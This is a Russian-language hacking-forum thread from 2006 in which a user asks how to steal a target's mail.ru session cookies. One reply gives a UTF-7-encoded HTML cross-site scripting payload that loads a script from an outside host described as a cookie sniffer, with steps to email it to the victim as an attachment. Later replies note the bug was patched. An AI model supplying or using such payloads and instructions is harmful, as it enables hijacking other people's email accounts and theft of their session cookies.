Обясните

Discussion in 'Уязвимости Mail-сервисов' started by Chumak, 29 Oct 2006.

Thread Status:
Not open for further replies.
  1. Chumak

    Chumak Elder - Старейшина

    Joined:
    27 Oct 2006
    Messages:
    59
    Likes Received:
    7
    Reputations:
    -4
    Пожалуйста напишите что надо отправить на мэйл врага чтоб на сниффер пришли cookie.
    Со вставлением cookie в браузер я знаком...
    А что отпрвлть не знаю!
    Буду оч благодарен!
     
  2. Chumak

    Chumak Elder - Старейшина

    Joined:
    27 Oct 2006
    Messages:
    59
    Likes Received:
    7
    Reputations:
    -4
    Ну пожалуйста!!!
     
  3. -Concord-

    -Concord- Elder - Старейшина

    Joined:
    16 Jun 2006
    Messages:
    158
    Likes Received:
    191
    Reputations:
    68
    Не понял.... ты чё статью не читал? или что тебе объяснить то ... тебе надо отправить хтмл страничку с кодом снифера
     
  4. Chumak

    Chumak Elder - Старейшина

    Joined:
    27 Oct 2006
    Messages:
    59
    Likes Received:
    7
    Reputations:
    -4
    Читал вот тока я не понял что надо отправлять в хтмл файле??
     
  5. Sn@k3

    Sn@k3 Elder - Старейшина

    Joined:
    13 Apr 2006
    Messages:
    1,000
    Likes Received:
    438
    Reputations:
    90
    а это случаем не майл ру? хе
     
  6. Chumak

    Chumak Elder - Старейшина

    Joined:
    27 Oct 2006
    Messages:
    59
    Likes Received:
    7
    Reputations:
    -4
    Случаем да!
     
  7. bxN5

    bxN5 Elder - Старейшина

    Joined:
    8 Jan 2006
    Messages:
    687
    Likes Received:
    138
    Reputations:
    32
    Если ты посмотрел видео XSS на mail.ru то знаю багу давно пофиксили
    Ну вот если не знал то етот скриптик
    PHP:
    <html>
    <
    meta http-equiv="Content-Type" content="text/html; charset=UTF-7">
    <
    TABLE><TD BACKGROUND="+ACYAIw-106+ACYAIw-97+ACYAIw-118+ACYAIw-97+ACYAIw-115+ACYAIw-99+ACYAIw-114+ACYAIw-105+ACYAIw-112+ACYAIw-116: document.write('+ACYAIw-60+ACYAIw-115+ACYAIw-99+ACYAIw-114+ACYAIw-105+ACYAIw-112+ACYAIw-116 SRC=http://devarsiv.org/alex/j.js> </SCRIPT>')">
    </
    html>
    http://devarsiv.org/alex/j.js> ето и есть ссылка на твой сниффер
    Етот код надо было скопировать в блокнот и сохранить с расширением html, и отправить как прикрепленный файл, жертва должна была его открыть и тебе пришли бы куки на сниффер.Про подмену куков ето уже другая история юзай поиск.
     
  8. Chumak

    Chumak Elder - Старейшина

    Joined:
    27 Oct 2006
    Messages:
    59
    Likes Received:
    7
    Reputations:
    -4
    "Если ты посмотрел видео XSS на mail.ru то знаю багу давно пофиксили
    Ну вот если не знал то етот скриптик"
    Этот скрипт отправлял в виде html....Но на снифер ниче не пришло (я не знал что пофиксили)...Спасибо что просветил..
    А нет другого скрипта?
     
  9. bxN5

    bxN5 Elder - Старейшина

    Joined:
    8 Jan 2006
    Messages:
    687
    Likes Received:
    138
    Reputations:
    32
    Я о таком не зняю(
     
  10. Майор

    Майор Active Member

    Joined:
    24 Oct 2004
    Messages:
    558
    Likes Received:
    112
    Reputations:
    146
    я думаю вряли кто тебе здесь отпишет активную XSS на mail.ru , потому что её тут же прикроют
     
    1 person likes this.
Thread Status:
Not open for further replies.